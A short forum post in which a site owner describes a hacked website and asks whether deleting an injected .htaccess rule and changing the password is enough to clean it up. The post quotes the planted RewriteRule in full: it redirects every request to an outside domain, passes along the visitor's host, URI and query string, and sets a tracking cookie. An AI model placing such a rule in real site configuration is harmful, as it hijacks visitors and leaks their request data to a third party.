I have had one of my sites hacked by someone changing my .htaccess file to include, at least:
RewriteRule ^(.*)$ http://costslaid.com/cgi-bin/r.cgi?p=15001&i=035a70e3&j=333&m=b0f0e6053bc35e3d3e220a67da346f03&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
I am inclined to simply remove the above from the .htaccess file, which, in total, contains the following:
# exgocgkctswo

Does anyone know if that is a satisfactory way of dealing with the issue (plus, of course, changing the password to a much more secure password)?
